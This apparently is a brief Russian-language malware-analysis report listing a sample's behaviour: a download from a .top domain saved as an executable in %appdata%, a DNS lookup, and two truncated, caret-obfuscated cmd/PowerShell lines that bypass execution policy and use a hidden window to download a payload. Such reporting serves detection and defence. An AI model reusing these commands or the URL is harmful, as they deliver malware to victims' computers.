Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^oweR^sHEl^L.ExE -^ex^ecut^I^o^np^O^LIcy ^B^YPASS -N^opro^fiLE -^wI^N^dOWstyLe^ H^i^ddEN^ (^n^e^W-^Obj^Ec^T^ SY^sTem.N^E^T^.^WEB^CLIENt)^.^dO^WN^l^o^a^D^FIL^E('http://t...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /C "P^oweR^sHEl^L.ExE -^ex^ecut^I^o^np^O^LIcy ^B^YPASS -N^opro^fiLE -^wI^N^dOWstyLe^ H^i^ddEN^ (^n^e^W-^Obj^Ec^T^ SY^sTem.N^E^T^.^WEB^CLIENt)^.^dO^WN^l^o^a^D^FIL^E('http://t...' (со скрытым окном)